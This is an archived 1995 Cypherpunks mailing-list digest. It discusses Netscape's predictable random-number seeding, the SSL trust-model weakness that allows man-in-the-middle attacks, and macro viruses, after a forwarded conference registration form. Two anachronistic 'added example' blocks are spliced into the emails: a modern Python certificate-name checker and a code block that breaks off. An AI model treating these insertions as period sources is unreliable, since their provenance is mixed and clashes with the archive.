Rapp Richard Bolton, National Industrial Information Infrastructure Protocols Consortium (NIIIP) 5:00 p.m. Conference adjourns ************* REGISTRATION FORM *********** Name (Please type) _____________________________________ (Prof., Dr., Mr., Ms., Mrs.) First Last Title: _______________________________________ Organization: _________________________________ Address: ____________________________________ _______________________________________ City State Zip Code Country Telephone: (_____)__________ Work (_____)________Home Fax: (_____)__________ Email: __________________ Which days do you plan to attend? Sunday, Oct.29 ______ (Reception) Monday, Oct.30 ______ (Lunch) Monday, Oct.30 ______ (Banquet) Tuesday, Oct.31 ______ (Lunch) Registration Fee: Before October 13, 1995 ______ $300 : After October 13, 1995 ______ $395 (Payment must be made by check or money order payable to the RGK Foundation.) Please complete and mail this registration form along with registration fee before Friday, October 13, 1993 to: Electronic Commerce Conference RGK Foundation 1301 W.25th Street Suite 300 Austin, TX 78705 Phone: 512-474-9298 Fax: 512-474-6389 To register for the conference, complete and mail the Registration Form to the RGK Foundation at 1301 W. 25th Street, Suite 300, Austin, Texas 78705. Be sure to include a check for the registration fee payable to the RGK Foundation. The registration fee is $300 for registrations received before Friday, October 13 and $395 after October 13 and includes the reception on Sunday, the banquet on Monday evening, breakfast and lunch on Monday and Tuesday, coffee breaks, scheduled ground transportation to and from the conference site, and conference materials. ************* HOTEL INFORMATION *********** We have reserved a block of rooms at the Red Lion Hotel Austin Airport, 6121 North IH 35, Austin, Texas 78752. The special room rate of $89.00 single/double will be available for those who make reservations before Friday, October 13. 
After this date, the special rate and room availability cannot be guaranteed. Make your reservations by calling 512-323-5466 and mentioning the Electronic Commerce Conference. ************* SPEAKER INFORMATION *********** 1. Nathaniel Borenstein Chief Scientist, First Virtual Holdings Nathaniel is a primary author of MIME, the Internet standard format for interoperable multimedia data, and the author of various widely used software packages, including the Andrew Message System, metamail, ATOMICMAIL, and Safe-Tcl. He specializes in end-user interfaces, and is the author of the book 'Programming As If People Mattered." 2. Clifford Neuman Research Assistant Professor, University of Southern California and Scientist, USC Information Sciences Clifford Neuman is a scientist at the Information Sciences Institute of the University of Southern California (USC) and holds a research faculty appointment in the Computer Science Department. After receiving a S.B. degree from the Massachusetts Institute of Technology in 1985 he spent a year working for Project Athena where he was one of the principal designers of the Kerberos authentication system. Dr. Neuman received M.S. and Ph.D. degrees from the University of Washington, where he designed the Prospero Directory Service which is widely used to locate information from Internet archive sites. His recent work includes the development of a security infrastructure supporting authorization, accounting, and electronic payment mechanisms. Dr. Neuman leads the design and implementation of the NetCheque and NetCash payment systems. 3. Dave Crocker Brandenburg Consulting Title: An Unaffiliated View of Electronic Commerce Dave Crocker is the primary author of The EDI on the Internet RFC. He is an active participant in the Internet Engineering and Technical Standards Committee and has influenced numerous internet standards. 4. Dan Connolly Research Associate, MIT/W3C Dan Connolly discovered the web project soon after graduating U.T. 
Austin in 1990. His industry experience in online documentation tools, distributed computing, and information delivery kept him in touch with the project while he was at Dazel and HaLSoft. His background in formal systems led him to work on the specification of HTML and other parts of the web. 5. Professor Donna Hoffman Owen Graduate School of Management Vanderbilt University Donna Hoffman is an Associate Professor of Marketing and directs Project 2000, a research program in Computer-Mediated Marketing Environments which is devoted to studying the marketing implications of commercializing the World Wide Web. Examples of current projects include 1) developing the strategic marketing implications of commercial scenarios of the Web; 2) modeling consumer response to advertising and consumer search and purchase behavior in online commercial environments; 3) survey research on Internet usage; and 4) consumer behavior implications of computer-mediated communications. 6. Smoot Carl Mitchell Zilker Internet Park Smoot Carl-Mitchell is Managing Partner in Texas Internet Consulting (TIC), which consults in networks and open systems, with particular emphasis on TCP/IP networks, UNIX systems and standards. He was the principal author of Practical Internetworking with TCP/IP and UNIX, 1993 and is co-author of The Internet Connection: System Connectivity and Configuration. He is also President of Matrix Information and Directory Services, Inc., of Austin. 7. Andrew Whinston The University of Texas at Austin Andrew B. Whinston is the Hugh Roy Cullen Centennial Chair in Business Administration, Professor of Information Systems, Computer Science and Economics and Director of the Center for Information Systems Management. He is editor of two journals Decision Support Systems and Organizational Computing and co-author or co-editor of 15 books and over 250 articles. 
Recent research interests are Internet pricing and application of client-server computing especially to support groups working collaboratively. 8. Ravi Kalakota Xerox Assistant Professor of Information Systems The University of Rochester Ravi Kalakota received his Ph.D from the University of Texas at Austin. He has been working in the area of electronic commerce since 1992. He is currently focusing on the challenges of organizing for electronic commerce: structured documents, processes/workflows, and broker architectures. His current project is on "New Product Introduction Using the Internet." He is also the co-author of a forthcoming book: The Frontiers of Electronic Commerce (Addison Wesley). 9. Win Treese Director of Advanced Technology Open Market, Inc. Win Treese leads the security and advanced technology groups at Open Market, Inc., a young company developing systems and software for electronic commerce. He has previously been a member of the research staff at Digital Equipment Corporation's Cambridge Research Laboratory and Chief Systems Engineer at MIT's Project Athena. 10. Larry Masinter Principal Scientist Xerox Palo Alto Research Center Dr. Masinter is a principal scientist at the Xerox Palo Alto Research Center. He has been working in the area of document management system architecture since 1988, the Web standards groups from their inception, and the research area of Digital Libraries since 1993. 11. Jill H. Ellsworth Senior Partner, Oak Ridge Research Jill H. Ellsworth, Ph.D., Senior Partner with Oak Ridge Research, is a consultant regarding business on the Internet for Fortune 500 companies, and is a frequent speaker in North America and Europe about business, marketing and education on the Internet. A former university Professor and Dean, she holds a doctorate from Syracuse University. 
Ellsworth is the author of numerous books, including The Internet Business Book, Marketing on the Internet, the Internet Business Kit (John Wiley & Sons), and Education on the Internet (Sams/Macmillan). She serves on the Survey Working Group of the Internet Society. 12. Su-Shing Chen Professor of Computer Science University of North Carolina Dr. Chen received his Ph.D. in 1970 from the University of Maryland. He was on the faculty of University of Florida, Georgia Tech, University of Maryland, and University of North Carolina. From 1983-85 and 1991-95, he served as NSF Program Director of Intelligent Systems, Knowledge Models & Cognitive Systems, and Information Technology & Organizations. 13. Dr. Arthur Keller Senior Research Scientist Stanford University Dr. Arthur Keller is a Senior Research Scientist at Stanford University. He is Project Manager of Stanford University's participation in CommerceNet, which is doing the first large-scale market trial of electronic commerce on the Internet. He leads the effort on smart catalogs and virtual catalogs. He was Manager of the Penguin project, to provide sharing of persistent object data among multiple applications. He is also working on managing inconsistency in federated, autonomous database systems. His publications include work on database security, databases on parallel computers, incomplete information in databases, database system implementation, hypertext databases, and computerized typesetting. 14. Dr. Jan Stallaert Assistant Professor The University of Texas at Austin Dr. Stallaert received his Ph.D. from UCLA in the area of management science. He has been working in the area of supply-chain management and large-scale logistics problems for several years. He is also a consultant for several Fortune 500 companies. 15. Dr. Preston McAfee Professor The University of Texas at Austin and MIT Dr. McAfee is a leading expert on electronic auctions. 
He has been retained as the principal consultant by the Federal Communications Commission to devise mechanisms for allocating wireless frequencies. He is also the editor of the prestigious American Economic Review. --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From fair at clock.org Mon Sep 25 10:37:25 1995 From: fair at clock.org (Erik E. Fair (Time Keeper)) Date: Mon, 25 Sep 95 10:37:25 PDT Subject: Persistent Services Needed Message-ID: One way to establish persistent services is to use the DNS for indirection: register a name for a service (or a set of services), which then point to servers of those services by a DNS name. If the service needs to move (hosts, net connections, etc), the only thing that changes is the DNS zone file and the references to the service through the name stay exactly the same. Hell, if your service requires no state information or can have replicated data (e.g. DNS, FTP, WWW), you can use "round robin" techniques with very low DNS RR TTL's to spread the service load over a bunch of widely distributed hosts. The NetBSD gang understand this principle: netbsd.org has several servers all over the place: E-mail to netbsd.org is handled at MIT. www.netbsd.org is served up by WWU.EDU ftp.netbsd.org is at CMU. Perhaps Eric Hughes can be prevailed upon to permit "privacy.net" to be used in this manner. Erik Fair From sameer at c2.org Mon Sep 25 10:46:18 1995 From: sameer at c2.org (sameer) Date: Mon, 25 Sep 95 10:46:18 PDT Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit Message-ID: <199509251741.KAA04656@infinity.c2.org> I was thinking recently how the events of the past week or so have turned me into a sort of a Netscape advocate. 
Granted, there are bugs in Netscape, and there probably will be more bugs uncovered (someone needs to write an exploit if they want themselves & Ray to get a T-shirt btw), but Netscape is interested in fixing problems and the new 2.0 is doing encrypted email, probably with a really nice interface (Haven't seen it yet, of course) and they are working to make the 128-bit version downloadable. (The 128bit version is available overseas already anyway, I hear.) The really big sticking point I see, however, is the certification authorities. There is a single point of failure here and that is at Verisign. This becomes a large problem I think if the encrypted email that Netscape does requires personal x509 certificates (I read that Verisign is issuing those for $9/each.) This is a problem because for one thing I don't think Verisign will want to issue certs to pseudonyms, and Netscape may not talk encrypted email to non-certified people. (I am not sure) The solution to this, of course, is to allow Navigator to accept alternate certification hierarchies, so we can setup a Cypherpunks cert agency or a c2.org cert agency, which -will- sign nym's keys, etc. The question exists though, as to whether or not Netscape will allow for alternate agencies in Navigator. I haven't seen any mention of this feature in 2.0, so if the feature exists in 2.0, then great! Otherwise, unless Netscape is going to allow for alternate cert agencies on a specific timescale, I think we have to do something about it in order to force the issue. Along the same lines of what happened recently-- because of the exposed hole and the pressure put on Netscape, management was finally willing to let some of the code be available for public review. If something happened to show how relying on a single point of failure such as Verisign was bad and resulted in much press & publicity, then perhaps Netscape management would be convinced to allow for alternate cert hierarchies.. 
Some sort of hack which demonstrates this would be great. I am feeling uncreative and can't think of anything effective short of stealing Verisign's private key, but that would be pretty damn tough. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From patrick at Verity.COM Mon Sep 25 10:46:32 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Mon, 25 Sep 95 10:46:32 PDT Subject: Defense against a class of programming bugs Message-ID: <9509251742.AA21506@cantina.verity.com> > > >Unfortunately, strdup is not posix compliant. If you want to use > >it and maintain portability, you'll have to write your own. > > Er, you're kidding, right? drand48 isn't in Posix either, for example. > Someone who runs on Motif and Mac has strdup as the least of their > worries. But just in case it's stopping anyone: > char *strdup(const char *x) { char *p; > return (p = malloc(strlen(x) + 1)) ? strcpy(p, x) : 0; > } Nah, I'm not kidding...I have to write code that runs on LOTS of platforms including macs, pcs, and lots of variants of Unix...I assume there's a lot of others that do as well...you have to make money where you can, and even with free software given out to the net, you want to make it portable as a matter of pride. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. 
patrick at verity.com, 1550 Plymouth Street, Mountain View, California 94303
Phone: (415)960-7600   FAX: (415)960-7750
"Have Sword, Will Travel"

From gorkab at sanchez.com Mon Sep 25 10:52:40 1995
From: gorkab at sanchez.com (Brian Gorka)
Date: Mon, 25 Sep 95 10:52:40 PDT
Subject: List of US representatives
Message-ID: <00996ED487C83F20.00003C77@sanchez.com>

Someone posted a list of US reps awhile back... Can someone forward me a copy? Thanks.

Brian Gorka

From jonm at netscape.com Mon Sep 25 11:19:15 1995
From: jonm at netscape.com (Jon Mittelhauser)
Date: Mon, 25 Sep 95 11:19:15 PDT
Subject: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <446rp8$14h@tera.mcom.com>

adam at lighthouse.homeport.org (Adam Shostack) wrote:
>Jeff Weinstein wrote:
>|
>| More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin,
>| and feed it through the RNG hash. On Unix and PC systems we feed the
>| environment through the hash, so that would be a good place for a
>| concerned user to put some random stuff of their own.
>
>On a SunOS (or any BSD) box ps -e will get you environment variables.
>
>ps -eaxuw
>USER PID %CPU %MEM SZ RSS TT STAT START TIME COMMAND
>root 53 0.0 0.0 68 0 ? IW Sep 19 0:02 portmap HOME=/
>PATH=/bin:/usr/bin:/usr/etc:/usr/ucb
>root 68 0.0 0.0 16 0 ? I Sep 19 0:00 (biod)
>root 58 0.0 0.0 40 0 ?
IW Sep 19 0:00 keyserv HOME=/
>PATH=/bin:/usr/bin:/usr/etc:/usr/ucb

If you take a look at the code you will see that this (and a ton of other things) are already being done...Jeff is only pointing out an extra item which is of special interest to the people in this group...we are no longer relying on any single item of data but rather a very large set and constant re-seeding during idle loops...

-Jon

From jlasser at rwd.goucher.edu Mon Sep 25 11:57:48 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Mon, 25 Sep 95 11:57:48 PDT
Subject: Notes security question
In-Reply-To: <199509230133.VAA05532@gold.interlog.com>
Message-ID:

On Fri, 22 Sep 1995, Herb Sutter wrote:
> While I'm at it, here's a question I've been wondering about recently: Why
> is it I've never heard of any security issues with Lotus Notes? Are there
> no known weaknesses? Or did existing weaknesses just not get much press
> because Notes isn't a commercially visible consumer product like Netscape?

Perhaps the Notes pricing scheme is sooo outrageous (by the standards of a student like myself, and probably most others, if it's still anything like it was at the 1.0 release) that most people have had zero opportunity to examine the program, let alone really have time to play with it?

Jon
------------------------------------------------------------------------------
Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

From jlasser at rwd.goucher.edu Mon Sep 25 12:02:32 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Mon, 25 Sep 95 12:02:32 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To:
Message-ID:

On Fri, 22 Sep 1995 dmandl at panix.com wrote:
> On Fri, 22 Sep 1995, Adam Shostack wrote:
> > Perry E. Metzger wrote:
> >
> > | I don't believe the Sun Java stuff would suffer from it, although I
> > | fear Java a great deal.
> >
> > I keep hearing this thought.
> > Isn't Win95 with its
> > 'executables in email' much more dangerous than Java, which at least
> > tries to address security?
>
> Is that the new MS-Word you're thinking of? I hear that it lets you
> imbed macros containing executable code in documents. That's got to
> be one of the most dangerous ideas ever cooked up.

Agreed; but it's present, not just in Word (every version since 2.0, as far as I can tell, in fact, since they all let you make system calls...), but in Microsoft Network, Microsoft Access, Microsoft Excel... I believe PowerPoint and Publisher are exempt from this bug, if only because the current versions have no macro languages... One of the penalties that modern software (at least for Windows) imposes is the ability to create massive viri, simply by allowing system calls to be executed from macros (if this was not the case, OLE technology wouldn't work, and interoperation between Windows programs can't occur, thereby crippling the system through bad design regardless of which alternative was chosen)

Jon
------------------------------------------------------------------------------
Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

From jgrubs at left.webcasters.com Mon Sep 25 12:03:16 1995
From: jgrubs at left.webcasters.com (Jim Grubs W8GRT)
Date: Mon, 25 Sep 95 12:03:16 PDT
Subject: CyberAngels
In-Reply-To: <9qJZBD1w165w@left.webcasters.com>
Message-ID: <6RZZBD1w165w@left.webcasters.com>

To: morning at npr.org
Cc: root
Subject: CyberAngels
From: jgrubs at left.webcasters.com (Jim Grubs (W8GRT))
Reply-To: jgrubs at left.webcasters.com (Jim Grubs (W8GRT))
Message-ID: <9qJZBD1w165w at left.webcasters.com>
Date: Mon, 25 Sep 95 09:09:55 EDT
Organization: WebCasters(tm)

-----BEGIN PGP SIGNED MESSAGE-----

Just what this world needs -- more vigilantes. To my mind, they are the moral equivalent of the right wing militia groups.
A technical point: The piece would have the people who are not computer literate believe that GIF and JPG are code words for porn pictures and are used only in that context. The truth is they are merely computer filename extensions used for two different graphical data formats. You will also find GIF and JPG formatted images used on the Whitehouse WWW page, the Library of Congress' THOMAS, and the WWW page for the Pope's visit to Baltimore - not to mention the WWW page I just created for a customer selling polluted water filtration systems.

I have never in my 62 years witnessed any news story on any subject about which I had any personal knowledge or expertise that did not contain factual errors. Is it any wonder that people are increasingly skeptical of the news media?

-- WebCasters(tm) James C. Grubs jgrubs at left.webcasters.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programming, Information brokering

From bianco at itribe.net Mon Sep 25 12:08:53 1995
From: bianco at itribe.net (David J. Bianco)
Date: Mon, 25 Sep 95 12:08:53 PDT
Subject: Persistent Services Needed
In-Reply-To:
Message-ID: <199509251905.PAA28033@gatekeeper.itribe.net>

On Sep 25, 10:36, "Erik E. Fair" (Time Keeper) sent the following to the NSA's mail archives:
> Subject: Re: Persistent Services Needed
|| One way to establish persistent services is to use the DNS for
|| indirection: register a name for a service (or a set of services), which then point to
|| servers of those services by a DNS name.
|| If the service needs to move
|| (hosts, net connections, etc), the only thing that changes is the
|| DNS zone file and the references to the service through the name stay
|| exactly the same. Hell, if your service requires no state information
|| or can have replicated data (e.g. DNS, FTP, WWW), you can use "round
|| robin" techniques with very low DNS RR TTL's to spread the service
|| load over a bunch of widely distributed hosts.
||

Sounds like a good idea to me. I've always kinda wondered why there wasn't a cypherpunks.org or something. It'd certainly make it easier for folks to find us...

-- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/

From vznuri at netcom.com Mon Sep 25 12:28:47 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Mon, 25 Sep 95 12:28:47 PDT
Subject: PM's Netscape rant
Message-ID: <199509251924.MAA05096@netcom18.netcom.com>

I thoroughly enjoyed PM's vituperative, venomous, and vitriolic Netscape rant. it just wouldn't be the cypherpunks list without the pit bull of the internet nipping at everyone's heels here and slaying any unwarranted peace!! however I haven't seen any well-deserved rebuttals however, so.. I'm again going to be a netscape apologist and say, GEEZ, PM, will you take it easy, and untangle your underwear knots?

as has been pointed out numerous times, the encryption in the Netscape code is designed to handle credit card number transport, *not* actual cash transport. it's really silly to have more security present than is available than the weakest link. it would be like worrying about a fence around the white house when one is giving open tours to the public every day!!
PM is rather secretive about the systems he is working on, but I suspect they are stock systems that must be highly secure because they actually involve *transfer* of cash, and *large*amounts* of it, in a *time-critical* environment, with *large corporate clients*. these are all inappropriate criteria to judge Netscape by. in the Netscape scenario, the software is *not* transferring cash itself, *not* transferring large amounts of it, and *not* in a time critical application, and *not* geared toward large corporations, but instead individual users. it is relying on another infrastructure (credit cards) for the actual transaction mechanisms.

as has been pointed out numerous times, the whole credit card apparatus is somewhat based on "security through obscurity", i.e. the obscurity of a credit card number, and it doesn't make a whole lot of sense to try to make this more "secure". this is a problem for credit card companies to fix (I agree it is a horrible problem, that costs us billions, and should have been fixed a long time ago) .. but holding credit card *using* companies responsible for this deficiency doesn't make sense. they are not the enemy!! they would surely seize the most secure mechanism available, if there were alternatives.

the distinction is subtle, but I think a relevant one: is the software itself transferring cash, or building on another system that does so? hopefully in the latter case, the requirements for a successful implementation are not so difficult to achieve (so that even fresh-out-of-college CS students can call the functions to do so, and perhaps code packages are written such that the user is protected from their own naivete, or what PM would call stupidity or incompetence).

--

PM gives some excellent techniques for improving code security (some of these may not be exactly what he proposed):

1. hiring experts
2. code reviews
3. restrictions of who can work on what code (security clearance)
4. heavy testing
5. antagonistic attacks (i.e.
hiring someone trying to crack the code that others have written)
6. open review of key code

however, put all these things together and you get a company apparatus a bit more like the NSA than a commercial company. I agree that all these precautions are relevant for banking and stock transaction software transferring millions of dollars. but holding a joe-schmoe GUI and Web company responsible for this kind of paranoid oversight is really impossible and unrealistic and *unnecessary*. there will be some companies that specialize in creating the *secure*infrastructure* for communications transactions. other companies will just *latch on* to this existing infrastructure. hopefully the requirements for *latching on* will not be too difficult, otherwise we are all in trouble!!

now, admittedly, it would be ideal if the netscape code was highly secure, but again, I just don't think it is in the best interests of this company to become security paranoid to the degrees that I have listed above, and the extreme degrees that people here are ranting about. rather they should try to blend in with other companies who specialize in cryptographic security. the latter companies should as much as possible provide foolproof modules. they should take care of all functions that have a potential for problem, such as random number generation, key exchange, etc. they should try to provide a minimum of training where the code is not foolproof.

many have been making the point that one cannot judge the security of a package based simply on analyzing key modules. I actually don't think this has been proven in general and completely resolved yet. I can imagine modules that communicate with software such that the module itself is a "secure environment" in general, and it is almost impossible to misuse the software itself. (for example, the software might never store the actual keys of transactions itself, this being handled by a secure module, making it impossible to accidentally reveal them).
some day we might actually see "secure module support" built into a microprocessor. in many ways the microprocessors that guard against illegal memory accesses and illegal function calls are in a sense providing a kind of cryptographic security. and people who study secure OSes generally eventually conclude that for ultimate security, you almost have to work from the ground up, starting with memory, microprocessors, and network hardware.

--

so my general point is that PM's rant, while lots of fun to read..

>you @#$%^&* whippersnappers!! you don't have a @#$%^&* clue about
>REAL code!! us old timers were writing code as secure and impenetrable
>as granite bricks, impregnable as a frigid victorian grandmother,
>before you were a twinkle in your mama's eye!! learn some
>sufficient grovelling skills for your superiors or you will
>not only be fired from your JOB but be excommunicated from the
>entire INDUSTRY, perhaps even tarred, feathered, drawn, quartered, and
>hung from your neck in the nearest tree!!! your employer will throw
>you to the wolves, your customers will spit on your flayed carcass,
>your family will look upon your shrivelled remains with shame, the
>vultures will vomit your undigestable eviscerated entrails,
>and the world immediately explode, if you have a
>SINGLE BUFFER OVERFLOW *anywhere* in your code!!

(ahem) this is not appropriate in the context of Netscape's aims, unless they want to become financial transaction experts more in line with banking expertise. netscape is more a "bring cyberspace to the masses" company, not "bring secure transactions to cyberspace". it's just because so few companies are successfully doing the latter, that netscape is forced to implement some "key" aspects of it to support the former. but I suspect they may ease out of the cryptographic security business in the long run, delegating it to other companies' plug-in-packages.

furthermore, cyberspace is growing gradually.
the way we get to really incredible secure transactions is through a growing process, an evolution in which mistakes are made at different levels, and which in the beginning the software is not much more than a toy that looks pretty and has the fewest moving parts and most simplistic design imaginable. I fully believe that some day a company in cyberspace will exist that satisfies PM's and all other cypherpunks' most erotic dreams about secure transactions. however that day is years away and it will take a long time to reach it. and I doubt that it will be the same company that is playing around with GUI's for the end user and hiring college programming hot-shots and Java geeks.

IMHO netscape is probably not going to be the company that will try to bring the *lowlevel infrastructure* for cash, judging by the current winds, although that could change. they will definitely help guide its progress and be interacting with the companies that do, however. when the big Secure Transactions Inc. company is invented for cyberspace, *then* the kinds of absolutely uncompromising standards that PM embodies will be in place. but again, we cannot expect the companies of today to embody that ideology and atmosphere for a few years yet.

the cypherpunks play a very valuable role in finding these "growing pain" mistakes of beginning companies such as Netscape, but we are not really serving our own best interests or the harmonious growth of cyberspace by vilifying/ embarrassing/ browbeating/ humiliating companies or their employees over their security problems, at least if they are clearly responsive to far less ammunition. keep in mind that NSA unbreakable security is *just*not*appropriate* in every situation, and in fact "weak" encryption does have legitimate uses (i.e. in a world where people routinely lock their keys in their cars). (although I agree, in general one should always try to design a system to be as secure as possible.)
(oops, I used the term "we" in that paragraph, a grave cypherpunk sin.. my humble apologies; @#$%^&* cryptoanarchist vocabulary)

that all said, nevertheless, I do enjoy PM's periodic displays of undigestable bile eruptions at least as much as one of the other infamous amusing crackpots circulating in this corner of cyberspace.. (but geez, PM, were you raised by a pack of wild wolves or what?)

p.s. to TCM: why do you continually find my login name abbreviation so fascinating??? my apologies to anyone if I am missing some kind of inside joke here, I'm a little dense at times

From ses at tipper.oit.unc.edu Mon Sep 25 12:53:39 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Mon, 25 Sep 95 12:53:39 PDT
Subject: SSL Man-in-the-middle
In-Reply-To: <199509251247.IAA27297@gatekeeper.itribe.net>
Message-ID:

I can confirm that, at least up to 1.2, netscape navigator does not do any validation beyond checking the signer of the certificate.

Exactly - the trust model used in Navigator 1.1N requires you to trust every single owner of a valid certificate. Getting hold of any key is vastly easier than having to obtain a specific key; in the worst case, you just buy your own - SSL exchanges are repudiable, and a few simple tricks can make sure your certificate doesn't show up in the "Document Information" dialog box. Or, since there is CRLing, accidentally lose your private key, notify Verisign and get a revocation.

To detect the attack without using either a modified client, or a nice proxy that checks for you, you must do packet-tracing on all SSL connections, regenerate the exchange, and then review each exchange to look for suspicious certificates.
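The validation step Simon says Navigator skips, as an added example that is not code from the thread or from Netscape: checking the signer only tells you a CA vouched for *some* certificate, so a client must also check that the certificate names the host it meant to reach. Certificates are represented in the dict shape Python's `ssl.SSLSocket.getpeercert()` returns; the certificate contents are constructed, and chain validation is assumed to have been done separately.

```python
"""Peer-name check for an SSL/TLS certificate (added example).

Verifying the signer of a certificate says nothing about whose
certificate it is.  This module adds the missing step: the name in
the certificate must match the host the client intended to reach.
Certificate chain validation is assumed to happen elsewhere.
"""

from __future__ import annotations


def dns_names(cert: dict) -> list[str]:
    """Return the DNS names a certificate is valid for.

    subjectAltName DNS entries take precedence (RFC 6125); the subject
    commonName is consulted only when no SAN DNS entry is present.
    """
    names = [value for kind, value in cert.get("subjectAltName", ())
             if kind == "DNS"]
    if names:
        return names
    for rdn in cert.get("subject", ()):
        for attr, value in rdn:
            if attr == "commonName":
                names.append(value)
    return names


def match_name(pattern: str, hostname: str) -> bool:
    """Match one certificate name against a hostname.

    Comparison is case-insensitive and ignores a trailing dot.  A
    wildcard is honoured only as the entire leftmost label and never
    spans a label boundary: '*.example.org' matches 'a.example.org'
    but neither 'b.a.example.org' nor 'example.org'.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    # Wildcard must be the whole leftmost label with at least two more labels.
    if p_labels[0] != "*" or len(p_labels) < 3:
        return False
    if any("*" in label for label in p_labels[1:]):
        return False
    if len(p_labels) != len(h_labels) or h_labels[0] == "":
        return False
    return p_labels[1:] == h_labels[1:]


def verify_peer_name(cert: dict, hostname: str) -> bool:
    """True if the certificate names the host we meant to talk to."""
    return any(match_name(name, hostname) for name in dns_names(cert))


# --- constructed sample certificates (hypothetical names, not real) ---
BANK_CERT = {
    "subject": ((("commonName", "www.bank.example"),),),
    "subjectAltName": (("DNS", "www.bank.example"), ("DNS", "bank.example")),
}
WILDCARD_CERT = {
    "subject": ((("commonName", "*.example.org"),),),
    "subjectAltName": (("DNS", "*.example.org"),),
}
# A validly signed certificate for some *other* site: a signer-only check
# (what the thread describes) would accept it for www.bank.example.
OTHER_SITE_CERT = {
    "subject": ((("commonName", "shop.example.net"),),),
    "subjectAltName": (("DNS", "shop.example.net"),),
}
LEGACY_CN_ONLY_CERT = {
    "subject": ((("countryName", "US"),), (("commonName", "old.example.net"),)),
}


if __name__ == "__main__":
    for cert, host in [(BANK_CERT, "www.bank.example"),
                       (OTHER_SITE_CERT, "www.bank.example"),
                       (WILDCARD_CERT, "a.example.org"),
                       (WILDCARD_CERT, "b.a.example.org")]:
        print(f"{host:18s} cert names {dns_names(cert)!s:32s} "
              f"-> {verify_peer_name(cert, host)}")
```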
From daw at CS.Berkeley.EDU Mon Sep 25 12:58:06 1995
From: daw at CS.Berkeley.EDU (David_A Wagner)
Date: Mon, 25 Sep 95 12:58:06 PDT
Subject: netscape bug
Message-ID: <199509251957.MAA15095@quito.CS.Berkeley.EDU>

In article <199509201855.LAA17261 at netcom16.netcom.com> you write:
>
> none of the articles mention that the cracker must have login access
> to the computer that the random numbers are generated on. is this true?
> does the code require knowledge of the PID etc. that can only be obtained
> by a login to the system that the netscape session is running on?
>

No, the time, pid, and ppid often leak to a remote adversary too. The attack probably requires a bit more sophistication when the cracker doesn't have login access, but I believe it's still possible. See my recent post to sci.crypt for some comments from Ian & I about this.

From shamrock at netcom.com Mon Sep 25 13:30:55 1995
From: shamrock at netcom.com (Lucky Green)
Date: Mon, 25 Sep 95 13:30:55 PDT
Subject: List of US representatives
Message-ID: <199509252028.QAA18640@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <00996ED487C83F20.00003C77 at sanchez.com>, gorkab at sanchez.com ("Brian Gorka") wrote:
>Someone posted a list of US reps awhile back... Can someone forward me a copy?

Everything you need to know to put pressure on Congress critters is at http://www.NRA.org/pub/congress/104/

I especially recommend http://www.NRA.org/pub/congress/104/congress.awk.Z

From the readme: "congress.awk is a comma-separated database of congress members & some unix awk code for manipulating the database"

--
-- Lucky Green PGP encrypted mail preferred.

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
From daw at CS.Berkeley.EDU Mon Sep 25 13:32:16 1995
From: daw at CS.Berkeley.EDU (David_A Wagner)
Date: Mon, 25 Sep 95 13:32:16 PDT
Subject: Exchange random numbers (was: Re: netscape's response)
Message-ID: <199509252031.NAA15134@quito.CS.Berkeley.EDU>

In article <199509211852.LAA22259 at Csli.Stanford.EDU> you write:
>
> | If I only ever give out a hash of my seed, and only ever *add* any received
> | info to my seed (and stir it in well), how can anyone find out anything?
> | (Apart from hash weaknesses.)
>
> Giving out contribution:
>     MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
> Taking in contribution :
>     my_seed = my_seed XOR
>         ((select_low_bits(remote_contrib, contrib_width) << contrib_area)
>

People seem to think this kind of thing is obviously safe. I'm not yet convinced.

By xoring in a quantity *chosen by your adversary*, you're essentially allowing related-key attacks on your stream cipher. (Your PRNG is just a stream cipher, keyed with my_seed.) No one knows how secure most ciphers are against related-key attacks: related-key attacks are known to be very powerful (often more powerful than any other type); but very little research on this topic is available. You're treading on unknown ground.

There's also a small error in your specific algorithm. Let n = stop_bit - start_bit; presumably n is much less than the length of your seed. Then a brute-force search over n bits will recover n bits of the seed -- this is a much faster cryptanalysis than a brute force over all bits of the seed. This can probably be fixed by something like MD5(select_bits(MD5(my_seed))) -> remote, but the related-key uncertainties still remain.
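Wagner's "small error" made concrete, as an added example (not code from the thread): publishing MD5 of an n-bit slice of the seed lets a 2**n search recover exactly those seed bits, whereas slicing MD5(seed) first (his suggested fix) means the same search only recovers bits of the digest, which say nothing about the seed without inverting MD5. The 128-bit seed, the least-significant-bit-first bit numbering and the 16-bit slice width are this example's assumptions.

```python
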